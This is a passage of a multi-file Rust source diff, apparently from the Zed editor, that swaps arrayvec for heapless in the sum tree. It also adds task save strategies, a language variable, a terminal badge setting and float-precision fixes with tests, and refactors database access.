+ let locking_connection = crate::connection::Connection::open_memory(Some(name));
+ locking_connection.exec("BEGIN IMMEDIATE").unwrap()().unwrap();
+ locking_connection
+ .exec("CREATE TABLE test(col TEXT)")
+ .unwrap()()
+ .unwrap();
+
+ let releaser = thread::spawn(move || {
+ thread::sleep(Duration::from_millis(10));
+ locking_connection.exec("ROLLBACK").unwrap()().unwrap();
+ });
+
+ ThreadSafeConnection::create_connection(false, name, Some("PRAGMA FOREIGN_KEYS=true"));
+ releaser.join().unwrap();
}
}
@@ -3,8 +3,5 @@ use gpui::{Menu, MenuItem};
pub fn app_menus() -> Vec<Menu> {
use crate::actions::Quit;
- vec![Menu {
- name: "Storybook".into(),
- items: vec![MenuItem::action("Quit", Quit)],
- }]
+ vec![Menu::new("Storybook").items([MenuItem::action("Quit", Quit)])]
}
@@ -14,7 +14,7 @@ path = "src/sum_tree.rs"
doctest = false
[dependencies]
-arrayvec = "0.7.1"
+heapless.workspace = true
rayon.workspace = true
log.workspace = true
ztracing.workspace = true
@@ -1,5 +1,5 @@
use super::*;
-use arrayvec::ArrayVec;
+use heapless::Vec as ArrayVec;
use std::{cmp::Ordering, mem, sync::Arc};
use ztracing::instrument;
@@ -29,7 +29,7 @@ impl<T: Item + fmt::Debug, D: fmt::Debug> fmt::Debug for StackEntry<'_, T, D> {
#[derive(Clone)]
pub struct Cursor<'a, 'b, T: Item, D> {
tree: &'a SumTree<T>,
- stack: ArrayVec<StackEntry<'a, T, D>, 16>,
+ stack: ArrayVec<StackEntry<'a, T, D>, 16, u8>,
pub position: D,
did_seek: bool,
at_end: bool,
@@ -53,7 +53,7 @@ where
pub struct Iter<'a, T: Item> {
tree: &'a SumTree<T>,
- stack: ArrayVec<StackEntry<'a, T, ()>, 16>,
+ stack: ArrayVec<StackEntry<'a, T, ()>, 16, u8>,
}
impl<'a, 'b, T, D> Cursor<'a, 'b, T, D>
@@ -231,11 +231,13 @@ where
self.position = D::zero(self.cx);
self.at_end = self.tree.is_empty();
if !self.tree.is_empty() {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: self.tree.0.child_summaries().len() as u32,
- position: D::from_summary(self.tree.summary(), self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: self.tree.0.child_summaries().len() as u32,
+ position: D::from_summary(self.tree.summary(), self.cx),
+ })
+ .unwrap_oob();
}
}
@@ -267,11 +269,13 @@ where
Node::Internal { child_trees, .. } => {
if descending {
let tree = &child_trees[entry.index()];
- self.stack.push(StackEntry {
- position: D::zero(self.cx),
- tree,
- index: tree.0.child_summaries().len() as u32 - 1,
- })
+ self.stack
+ .push(StackEntry {
+ position: D::zero(self.cx),
+ tree,
+ index: tree.0.child_summaries().len() as u32 - 1,
+ })
+ .unwrap_oob();
}
}
Node::Leaf { .. } => {
@@ -297,11 +301,13 @@ where
if self.stack.is_empty() {
if !self.at_end {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: D::zero(self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: D::zero(self.cx),
+ })
+ .unwrap_oob();
descend = true;
}
self.did_seek = true;
@@ -361,11 +367,13 @@ where
if let Some(subtree) = new_subtree {
descend = true;
- self.stack.push(StackEntry {
- tree: subtree,
- index: 0,
- position: self.position.clone(),
- });
+ self.stack
+ .push(StackEntry {
+ tree: subtree,
+ index: 0,
+ position: self.position.clone(),
+ })
+ .unwrap_oob();
} else {
descend = false;
self.stack.pop();
@@ -467,11 +475,13 @@ where
if !self.did_seek {
self.did_seek = true;
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: D::zero(self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: D::zero(self.cx),
+ })
+ .unwrap_oob();
}
let mut ascending = false;
@@ -503,11 +513,13 @@ where
entry.index += 1;
entry.position = self.position.clone();
} else {
- self.stack.push(StackEntry {
- tree: child_tree,
- index: 0,
- position: self.position.clone(),
- });
+ self.stack
+ .push(StackEntry {
+ tree: child_tree,
+ index: 0,
+ position: self.position.clone(),
+ })
+ .unwrap_oob();
ascending = false;
continue 'outer;
}
@@ -578,11 +590,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> {
let mut descend = false;
if self.stack.is_empty() {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: (),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: (),
+ })
+ .unwrap_oob();
descend = true;
}
@@ -611,11 +625,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> {
if let Some(subtree) = new_subtree {
descend = true;
- self.stack.push(StackEntry {
- tree: subtree,
- index: 0,
- position: (),
- });
+ self.stack
+ .push(StackEntry {
+ tree: subtree,
+ index: 0,
+ position: (),
+ })
+ .unwrap_oob();
} else {
descend = false;
self.stack.pop();
@@ -748,8 +764,8 @@ trait SeekAggregate<'a, T: Item> {
struct SliceSeekAggregate<T: Item> {
tree: SumTree<T>,
- leaf_items: ArrayVec<T, { 2 * TREE_BASE }>,
- leaf_item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
+ leaf_items: ArrayVec<T, { 2 * TREE_BASE }, u8>,
+ leaf_item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
leaf_summary: T::Summary,
}
@@ -786,8 +802,8 @@ impl<T: Item> SeekAggregate<'_, T> for SliceSeekAggregate<T> {
summary: &T::Summary,
cx: <T::Summary as Summary>::Context<'_>,
) {
- self.leaf_items.push(item.clone());
- self.leaf_item_summaries.push(summary.clone());
+ self.leaf_items.push(item.clone()).unwrap_oob();
+ self.leaf_item_summaries.push(summary.clone()).unwrap_oob();
Summary::add_summary(&mut self.leaf_summary, summary, cx);
}
fn push_tree(
@@ -3,8 +3,8 @@ mod cursor;
pub mod property_test;
mod tree_map;
-use arrayvec::ArrayVec;
pub use cursor::{Cursor, FilterCursor, Iter};
+use heapless::Vec as ArrayVec;
use rayon::iter::{IndexedParallelIterator, IntoParallelIterator, ParallelIterator as _};
use std::marker::PhantomData;
use std::mem;
@@ -17,6 +17,17 @@ pub const TREE_BASE: usize = 2;
#[cfg(not(test))]
pub const TREE_BASE: usize = 6;
+// Helper for when we cannot use ArrayVec::<T>::push().unwrap(), because the error type T doesn't impl Debug.
+trait CapacityResultExt {
+ fn unwrap_oob(self);
+}
+
+impl<T> CapacityResultExt for Result<(), T> {
+ fn unwrap_oob(self) {
+ self.unwrap_or_else(|_| panic!("item should fit into fixed size ArrayVec"))
+ }
+}
+
/// An item that can be stored in a [`SumTree`]
///
/// Must be summarized by a type that implements [`Summary`]
@@ -243,8 +254,9 @@ impl<T: Item> SumTree<T> {
let mut iter = iter.into_iter().fuse().peekable();
while iter.peek().is_some() {
- let items: ArrayVec<T, { 2 * TREE_BASE }> = iter.by_ref().take(2 * TREE_BASE).collect();
- let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> =
+ let items: ArrayVec<T, { 2 * TREE_BASE }, u8> =
+ iter.by_ref().take(2 * TREE_BASE).collect();
+ let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> =
items.iter().map(|item| item.summary(cx)).collect();
let mut summary = item_summaries[0].clone();
@@ -284,8 +296,8 @@ impl<T: Item> SumTree<T> {
};
let child_summary = child_node.summary();
<T::Summary as Summary>::add_summary(summary, child_summary, cx);
- child_summaries.push(child_summary.clone());
- child_trees.push(child_node);
+ child_summaries.push(child_summary.clone()).unwrap_oob();
+ child_trees.push(child_node.clone()).unwrap_oob();
if child_trees.len() == 2 * TREE_BASE {
parent_nodes.extend(current_parent_node.take());
@@ -315,8 +327,8 @@ impl<T: Item> SumTree<T> {
.into_par_iter()
.chunks(2 * TREE_BASE)
.map(|items| {
- let items: ArrayVec<T, { 2 * TREE_BASE }> = items.into_iter().collect();
- let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> =
+ let items: ArrayVec<T, { 2 * TREE_BASE }, u8> = items.into_iter().collect();
+ let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> =
items.iter().map(|item| item.summary(cx)).collect();
let mut summary = item_summaries[0].clone();
for item_summary in &item_summaries[1..] {
@@ -337,9 +349,9 @@ impl<T: Item> SumTree<T> {
.into_par_iter()
.chunks(2 * TREE_BASE)
.map(|child_nodes| {
- let child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }> =
+ let child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8> =
child_nodes.into_iter().collect();
- let child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> = child_trees
+ let child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> = child_trees
.iter()
.map(|child_tree| child_tree.summary().clone())
.collect();
@@ -798,14 +810,16 @@ impl<T: Item> SumTree<T> {
<T::Summary as Summary>::add_summary(summary, other_node.summary(), cx);
let height_delta = *height - other_node.height();
- let mut summaries_to_append = ArrayVec::<T::Summary, { 2 * TREE_BASE }>::new();
- let mut trees_to_append = ArrayVec::<SumTree<T>, { 2 * TREE_BASE }>::new();
+ let mut summaries_to_append = ArrayVec::<T::Summary, { 2 * TREE_BASE }, u8>::new();
+ let mut trees_to_append = ArrayVec::<SumTree<T>, { 2 * TREE_BASE }, u8>::new();
if height_delta == 0 {
summaries_to_append.extend(other_node.child_summaries().iter().cloned());
trees_to_append.extend(other_node.child_trees().iter().cloned());
} else if height_delta == 1 && !other_node.is_underflowing() {
- summaries_to_append.push(other_node.summary().clone());
- trees_to_append.push(other)
+ summaries_to_append
+ .push(other_node.summary().clone())
+ .unwrap_oob();
+ trees_to_append.push(other).unwrap_oob();
} else {
let tree_to_append = child_trees
.last_mut()
@@ -815,15 +829,17 @@ impl<T: Item> SumTree<T> {
child_trees.last().unwrap().0.summary().clone();
if let Some(split_tree) = tree_to_append {
- summaries_to_append.push(split_tree.0.summary().clone());
- trees_to_append.push(split_tree);
+ summaries_to_append
+ .push(split_tree.0.summary().clone())
+ .unwrap_oob();
+ trees_to_append.push(split_tree).unwrap_oob();
}
}
let child_count = child_trees.len() + trees_to_append.len();
if child_count > 2 * TREE_BASE {
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }>;
- let right_summaries: ArrayVec<_, { 2 * TREE_BASE }>;
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>;
+ let right_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>;
let left_trees;
let right_trees;
@@ -868,7 +884,7 @@ impl<T: Item> SumTree<T> {
let left_items;
let right_items;
let left_summaries;
- let right_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>;
+ let right_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>;
let midpoint = (child_count + child_count % 2) / 2;
{
@@ -933,8 +949,10 @@ impl<T: Item> SumTree<T> {
*child_summaries.first_mut().unwrap() = first.summary().clone();
if let Some(tree) = res {
if child_trees.len() < 2 * TREE_BASE {
- child_summaries.insert(0, tree.summary().clone());
- child_trees.insert(0, tree);
+ child_summaries
+ .insert(0, tree.summary().clone())
+ .unwrap_oob();
+ child_trees.insert(0, tree).unwrap_oob();
None
} else {
let new_child_summaries = {
@@ -1016,7 +1034,7 @@ impl<T: Item> SumTree<T> {
.iter()
.chain(child_summaries.iter())
.cloned();
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> =
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> =
all_summaries.by_ref().take(midpoint).collect();
*child_summaries = all_summaries.collect();
@@ -1065,7 +1083,7 @@ impl<T: Item> SumTree<T> {
.iter()
.chain(item_summaries.iter())
.cloned();
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> =
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> =
all_summaries.by_ref().take(midpoint).collect();
*item_summaries = all_summaries.collect();
@@ -1088,11 +1106,11 @@ impl<T: Item> SumTree<T> {
) -> Self {
let height = left.0.height() + 1;
let mut child_summaries = ArrayVec::new();
- child_summaries.push(left.0.summary().clone());
- child_summaries.push(right.0.summary().clone());
+ child_summaries.push(left.0.summary().clone()).unwrap_oob();
+ child_summaries.push(right.0.summary().clone()).unwrap_oob();
let mut child_trees = ArrayVec::new();
- child_trees.push(left);
- child_trees.push(right);
+ child_trees.push(left).unwrap_oob();
+ child_trees.push(right).unwrap_oob();
SumTree(Arc::new(Node::Internal {
height,
summary: sum(child_summaries.iter(), cx),
@@ -1252,13 +1270,13 @@ pub enum Node<T: Item> {
Internal {
height: u8,
summary: T::Summary,
- child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
- child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }>,
+ child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
+ child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8>,
},
Leaf {
summary: T::Summary,
- items: ArrayVec<T, { 2 * TREE_BASE }>,
- item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
+ items: ArrayVec<T, { 2 * TREE_BASE }, u8>,
+ item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
},
}
@@ -1323,14 +1341,14 @@ impl<T: Item> Node<T> {
}
}
- fn child_trees(&self) -> &ArrayVec<SumTree<T>, { 2 * TREE_BASE }> {
+ fn child_trees(&self) -> &ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8> {
match self {
Node::Internal { child_trees, .. } => child_trees,
Node::Leaf { .. } => panic!("Leaf nodes have no child trees"),
}
}
- fn items(&self) -> &ArrayVec<T, { 2 * TREE_BASE }> {
+ fn items(&self) -> &ArrayVec<T, { 2 * TREE_BASE }, u8> {
match self {
Node::Leaf { items, .. } => items,
Node::Internal { .. } => panic!("Internal nodes have no items"),
@@ -182,7 +182,7 @@ impl SvgPreviewView {
buffer,
window,
move |this, _buffer, event: &BufferEvent, window, cx| match event {
- BufferEvent::Edited | BufferEvent::Saved => {
+ BufferEvent::Edited { .. } | BufferEvent::Saved => {
this.render_image(window, cx);
}
_ => {}
@@ -23,7 +23,7 @@ pub use debug_format::{
Request, TcpArgumentsTemplate, ZedDebugConfig,
};
pub use task_template::{
- DebugArgsRequest, HideStrategy, RevealStrategy, TaskTemplate, TaskTemplates,
+ DebugArgsRequest, HideStrategy, RevealStrategy, SaveStrategy, TaskTemplate, TaskTemplates,
substitute_variables_in_map, substitute_variables_in_str,
};
pub use util::shell::{Shell, ShellKind};
@@ -75,6 +75,8 @@ pub struct SpawnInTerminal {
pub show_command: bool,
/// Whether to show the rerun button in the terminal tab.
pub show_rerun: bool,
+ /// Which edited buffers to save before running the task.
+ pub save: SaveStrategy,
}
impl SpawnInTerminal {
@@ -172,6 +174,8 @@ pub enum VariableName {
Column,
/// Text from the latest selection.
SelectedText,
+ /// The language of the currently opened buffer (e.g., "Rust", "Python").
+ Language,
/// The symbol selected by the symbol tagging system, specifically the @run capture in a runnables.scm
RunnableSymbol,
/// Open a Picker to select a process ID to use in place
@@ -209,6 +213,7 @@ impl FromStr for VariableName {
"SYMBOL" => Self::Symbol,
"RUNNABLE_SYMBOL" => Self::RunnableSymbol,
"SELECTED_TEXT" => Self::SelectedText,
+ "LANGUAGE" => Self::Language,
"ROW" => Self::Row,
"COLUMN" => Self::Column,
_ => {
@@ -243,6 +248,7 @@ impl std::fmt::Display for VariableName {
Self::Row => write!(f, "{ZED_VARIABLE_NAME_PREFIX}ROW"),
Self::Column => write!(f, "{ZED_VARIABLE_NAME_PREFIX}COLUMN"),
Self::SelectedText => write!(f, "{ZED_VARIABLE_NAME_PREFIX}SELECTED_TEXT"),
+ Self::Language => write!(f, "{ZED_VARIABLE_NAME_PREFIX}LANGUAGE"),
Self::RunnableSymbol => write!(f, "{ZED_VARIABLE_NAME_PREFIX}RUNNABLE_SYMBOL"),
Self::PickProcessId => write!(f, "{ZED_VARIABLE_NAME_PREFIX}PICK_PID"),
Self::Custom(s) => write!(
@@ -72,6 +72,9 @@ pub struct TaskTemplate {
/// Whether to show the command line in the task output.
#[serde(default = "default_true")]
pub show_command: bool,
+ /// Which edited buffers to save before running the task.
+ #[serde(default)]
+ pub save: SaveStrategy,
}
#[derive(Deserialize, Eq, PartialEq, Clone, Debug)]
@@ -109,6 +112,19 @@ pub enum HideStrategy {
OnSuccess,
}
+/// Which edited buffers to save before running a task.
+#[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(rename_all = "snake_case")]
+pub enum SaveStrategy {
+ #[default]
+ /// Save all edited buffers.
+ All,
+ /// Save the current buffer.
+ Current,
+ /// Don't save any buffers.
+ None,
+}
+
/// A group of Tasks defined in a JSON file.
#[derive(Clone, Debug, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
pub struct TaskTemplates(pub Vec<TaskTemplate>);
@@ -271,6 +287,7 @@ impl TaskTemplate {
show_summary: self.show_summary,
show_command: self.show_command,
show_rerun: true,
+ save: self.save,
},
})
}
@@ -1072,7 +1089,6 @@ mod tests {
command,
..TaskTemplate::default()
};
-
assert!(task.unknown_variables().is_empty());
}
}
@@ -316,7 +316,9 @@ pub fn task_contexts(
let lsp_task_sources = active_editor
.as_ref()
- .map(|active_editor| active_editor.update(cx, |editor, cx| editor.lsp_task_sources(cx)))
+ .map(|active_editor| {
+ active_editor.update(cx, |editor, cx| editor.lsp_task_sources(false, false, cx))
+ })
.unwrap_or_default();
let latest_selection = active_editor.as_ref().map(|active_editor| {
@@ -437,7 +439,10 @@ mod tests {
let worktree_store = project.read_with(cx, |project, _| project.worktree_store());
let rust_language = Arc::new(
Language::new(
- LanguageConfig::default(),
+ LanguageConfig {
+ name: "Rust".into(),
+ ..Default::default()
+ },
Some(tree_sitter_rust::LANGUAGE.into()),
)
.with_outline_query(
@@ -453,7 +458,10 @@ mod tests {
let typescript_language = Arc::new(
Language::new(
- LanguageConfig::default(),
+ LanguageConfig {
+ name: "TypeScript".into(),
+ ..Default::default()
+ },
Some(tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into()),
)
.with_outline_query(
@@ -532,6 +540,7 @@ mod tests {
(VariableName::WorktreeRoot, path!("/dir").into()),
(VariableName::Row, "1".into()),
(VariableName::Column, "1".into()),
+ (VariableName::Language, "Rust".into()),
]),
project_env: HashMap::default(),
}
@@ -566,6 +575,7 @@ mod tests {
(VariableName::Column, "15".into()),
(VariableName::SelectedText, "is_i".into()),
(VariableName::Symbol, "this_is_a_rust_file".into()),
+ (VariableName::Language, "Rust".into()),
]),
project_env: HashMap::default(),
}
@@ -594,6 +604,7 @@ mod tests {
(VariableName::Row, "1".into()),
(VariableName::Column, "1".into()),
(VariableName::Symbol, "this_is_a_test".into()),
+ (VariableName::Language, "TypeScript".into()),
]),
project_env: HashMap::default(),
}
@@ -207,11 +207,16 @@ impl TerminalBounds {
}
pub fn num_lines(&self) -> usize {
- (self.bounds.size.height / self.line_height).floor() as usize
+ // Tolerance to prevent f32 precision from losing a row:
+ // `N * line_height / line_height` can be N-epsilon, which floor()
+ // would round down, pushing the first line into invisible scrollback.
+ let raw = self.bounds.size.height / self.line_height;
+ raw.next_up().floor() as usize
}
pub fn num_columns(&self) -> usize {
- (self.bounds.size.width / self.cell_width).floor() as usize
+ let raw = self.bounds.size.width / self.cell_width;
+ raw.next_up().floor() as usize
}
pub fn height(&self) -> Pixels {
@@ -3364,5 +3369,59 @@ mod tests {
scroll_by(-1);
}
}
+
+ #[test]
+ fn test_num_lines_float_precision() {
+ let line_heights = [
+ 20.1f32, 16.7, 18.3, 22.9, 14.1, 15.6, 17.8, 19.4, 21.3, 23.7,
+ ];
+ for &line_height in &line_heights {
+ for n in 1..=100 {
+ let height = n as f32 * line_height;
+ let bounds = TerminalBounds::new(
+ px(line_height),
+ px(8.0),
+ Bounds {
+ origin: Point::default(),
+ size: Size {
+ width: px(800.0),
+ height: px(height),
+ },
+ },
+ );
+ assert_eq!(
+ bounds.num_lines(),
+ n,
+ "num_lines() should be {n} for height={height}, line_height={line_height}"
+ );
+ }
+ }
+ }
+
+ #[test]
+ fn test_num_columns_float_precision() {
+ let cell_widths = [8.1f32, 7.3, 9.7, 6.9, 10.1];
+ for &cell_width in &cell_widths {
+ for n in 1..=200 {
+ let width = n as f32 * cell_width;
+ let bounds = TerminalBounds::new(
+ px(20.0),
+ px(cell_width),
+ Bounds {
+ origin: Point::default(),
+ size: Size {
+ width: px(width),
+ height: px(400.0),
+ },
+ },
+ );
+ assert_eq!(
+ bounds.num_columns(),
+ n,
+ "num_columns() should be {n} for width={width}, cell_width={cell_width}"
+ );
+ }
+ }
+ }
}
}
@@ -50,6 +50,7 @@ pub struct TerminalSettings {
pub minimum_contrast: f32,
pub path_hyperlink_regexes: Vec<String>,
pub path_hyperlink_timeout_ms: u64,
+ pub show_count_badge: bool,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
@@ -129,6 +130,7 @@ impl settings::Settings for TerminalSettings {
})
.collect(),
path_hyperlink_timeout_ms: project_content.path_hyperlink_timeout_ms.unwrap(),
+ show_count_badge: user_content.show_count_badge.unwrap(),
}
}
}
@@ -425,7 +425,7 @@ impl Domain for TerminalDb {
];
}
-db::static_connection!(TERMINAL_DB, TerminalDb, [WorkspaceDb]);
+db::static_connection!(TerminalDb, [WorkspaceDb]);
impl TerminalDb {
query! {
@@ -8,7 +8,7 @@ use crate::{
};
use breadcrumbs::Breadcrumbs;
use collections::HashMap;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures::{channel::oneshot, future::join_all};
use gpui::{
Action, AnyView, App, AsyncApp, AsyncWindowContext, Context, Corner, Entity, EventEmitter,
@@ -250,16 +250,17 @@ impl TerminalPanel {
) -> Result<Entity<Self>> {
let mut terminal_panel = None;
- if let Some((database_id, serialization_key)) = workspace
- .read_with(&cx, |workspace, _| {
+ if let Some((database_id, serialization_key, kvp)) = workspace
+ .read_with(&cx, |workspace, cx| {
workspace
.database_id()
.zip(TerminalPanel::serialization_key(workspace))
+ .map(|(id, key)| (id, key, KeyValueStore::global(cx)))
})
.ok()
.flatten()
&& let Some(serialized_panel) = cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
+ .background_spawn(async move { kvp.read_kvp(&serialization_key) })
.await
.log_err()
.flatten()
@@ -939,6 +940,7 @@ impl TerminalPanel {
else {
return;
};
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.spawn(async move |terminal_panel, cx| {
cx.background_executor()
.timer(Duration::from_millis(50))
@@ -953,17 +955,16 @@ impl TerminalPanel {
});
cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedTerminalPanel {
- items,
- active_item_id: None,
- height,
- width,
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedTerminalPanel {
+ items,
+ active_item_id: None,
+ height,
+ width,
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1606,6 +1607,9 @@ impl Panel for TerminalPanel {
}
fn icon_label(&self, _window: &Window, cx: &App) -> Option<String> {
+ if !TerminalSettings::get_global(cx).show_count_badge {
+ return None;
+ }
let count = self
.center
.panes()
@@ -9,13 +9,13 @@ use assistant_slash_command::SlashCommandRegistry;
use editor::{Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager};
use gpui::{
Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths,
- FocusHandle, Focusable, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent,
+ FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent,
Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions,
anchored, deferred, div,
};
use itertools::Itertools;
use menu;
-use persistence::TERMINAL_DB;
+use persistence::TerminalDb;
use project::{Project, ProjectEntryId, search::SearchQuery};
use schemars::JsonSchema;
use serde::Deserialize;
@@ -55,7 +55,7 @@ use workspace::{
CloseActiveItem, DraggedSelection, DraggedTab, NewCenterTerminal, NewTerminal, Pane,
ToolbarItemLocation, Workspace, WorkspaceId, delete_unloaded_items,
item::{
- BreadcrumbText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent,
+ HighlightedText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent,
},
register_serializable_item,
searchable::{
@@ -813,17 +813,16 @@ impl TerminalView {
return;
};
- if clipboard.entries().iter().any(|entry| match entry {
- ClipboardEntry::Image(image) => !image.bytes.is_empty(),
- _ => false,
- }) {
- self.forward_ctrl_v(cx);
- return;
- }
-
- if let Some(text) = clipboard.text() {
- self.terminal
- .update(cx, |terminal, _cx| terminal.paste(&text));
+ match clipboard.entries().first() {
+ Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => {
+ self.forward_ctrl_v(cx);
+ }
+ _ => {
+ if let Some(text) = clipboard.text() {
+ self.terminal
+ .update(cx, |terminal, _cx| terminal.paste(&text));
+ }
+ }
}
}
@@ -1655,12 +1654,14 @@ impl Item for TerminalView {
}
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
- Some(vec![BreadcrumbText {
- text: self.terminal().read(cx).breadcrumb_text.clone(),
- highlights: None,
- font: None,
- }])
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
+ Some((
+ vec![HighlightedText {
+ text: self.terminal().read(cx).breadcrumb_text.clone().into(),
+ highlights: vec![],
+ }],
+ None,
+ ))
}
fn added_to_workspace(
@@ -1674,11 +1675,11 @@ impl Item for TerminalView {
log::debug!(
"Updating workspace id for the terminal, old: {old_id:?}, new: {new_id:?}",
);
- cx.background_spawn(TERMINAL_DB.update_workspace_id(
- new_id,
- old_id,
- cx.entity_id().as_u64(),
- ))
+ let db = TerminalDb::global(cx);
+ let entity_id = cx.entity_id().as_u64();
+ cx.background_spawn(async move {
+ db.update_workspace_id(new_id, old_id, entity_id).await
+ })
.detach();
}
self.workspace_id = workspace.database_id();
@@ -1701,7 +1702,8 @@ impl SerializableItem for TerminalView {
_window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<()>> {
- delete_unloaded_items(alive_items, workspace_id, "terminals", &TERMINAL_DB, cx)
+ let db = TerminalDb::global(cx);
+ delete_unloaded_items(alive_items, workspace_id, "terminals", &db, cx)
}
fn serialize(
@@ -1726,14 +1728,13 @@ impl SerializableItem for TerminalView {
let custom_title = self.custom_title.clone();
self.needs_serialize = false;
+ let db = TerminalDb::global(cx);
Some(cx.background_spawn(async move {
if let Some(cwd) = cwd {
- TERMINAL_DB
- .save_working_directory(item_id, workspace_id, cwd)
+ db.save_working_directory(item_id, workspace_id, cwd)
.await?;
}
- TERMINAL_DB
- .save_custom_title(item_id, workspace_id, custom_title)
+ db.save_custom_title(item_id, workspace_id, custom_title)
.await?;
Ok(())
}))
@@ -1754,7 +1755,8 @@ impl SerializableItem for TerminalView {
window.spawn(cx, async move |cx| {
let (cwd, custom_title) = cx
.update(|_window, cx| {
- let from_db = TERMINAL_DB
+ let db = TerminalDb::global(cx);
+ let from_db = db
.get_working_directory(item_id, workspace_id)
.log_err()
.flatten();
@@ -1768,7 +1770,7 @@ impl SerializableItem for TerminalView {
.upgrade()
.and_then(|workspace| default_working_directory(workspace.read(cx), cx))
};
- let custom_title = TERMINAL_DB
+ let custom_title = db
.get_custom_title(item_id, workspace_id)
.log_err()
.flatten()
@@ -30,6 +30,24 @@ fn test_edit() {
assert_eq!(buffer.text(), "ghiamnoef");
}
+#[test]
+fn test_point_for_row_and_column_from_external_source() {
+ let buffer = Buffer::new(
+ ReplicaId::LOCAL,
+ BufferId::new(1).unwrap(),
+ "aéøbcdef\nsecond",
+ );
+ let snapshot = buffer.snapshot();
+
+ assert_eq!(snapshot.point_from_external_input(0, 0), Point::new(0, 0));
+ assert_eq!(snapshot.point_from_external_input(0, 4), Point::new(0, 6));
+ assert_eq!(
+ snapshot.point_from_external_input(0, 100),
+ Point::new(0, 10)
+ );
+ assert_eq!(snapshot.point_from_external_input(1, 3), Point::new(1, 3));
+}
+
#[gpui::test(iterations = 100)]
fn test_random_edits(mut rng: StdRng) {
let operations = env::var("OPERATIONS")
@@ -731,6 +749,48 @@ fn test_concurrent_edits() {
assert_eq!(buffer3.text(), "a12c34e56");
}
+// Regression test: applying a remote edit whose FullOffset range partially
+// overlaps a fragment that was already deleted (observed but not visible)
+// used to leave the fragment unsplit, causing the rope builder to read past
+// the end of the rope.
+#[test]
+fn test_edit_partially_intersecting_a_deleted_fragment() {
+ let mut buffer = Buffer::new(ReplicaId::new(1), BufferId::new(1).unwrap(), "abcdefgh");
+
+ // Delete "cde", creating a single deleted fragment at FullOffset 2..5.
+ // After this the fragment layout is:
+ // "ab"(vis, FullOffset 0..2) "cde"(del, 2..5) "fgh"(vis, 5..8)
+ buffer.edit([(2..5, "")]);
+ assert_eq!(buffer.text(), "abfgh");
+
+ // Construct a synthetic remote edit whose version includes the deletion (so
+ // the "cde" fragment is observed + deleted → !was_visible) but whose
+ // FullOffset range only partially overlaps it. This state arises in
+ // production when concurrent edits cause different fragment splits on
+ // different replicas.
+ let synthetic_timestamp = clock::Lamport {
+ replica_id: ReplicaId::new(2),
+ value: 10,
+ };
+ let synthetic_edit = Operation::Edit(EditOperation {
+ timestamp: synthetic_timestamp,
+ version: buffer.version(),
+ // Range 1..4 partially overlaps the deleted "cde" (FullOffset 2..5):
+ // it covers "b" (1..2) and only "cd" (2..4), leaving "e" (4..5) out.
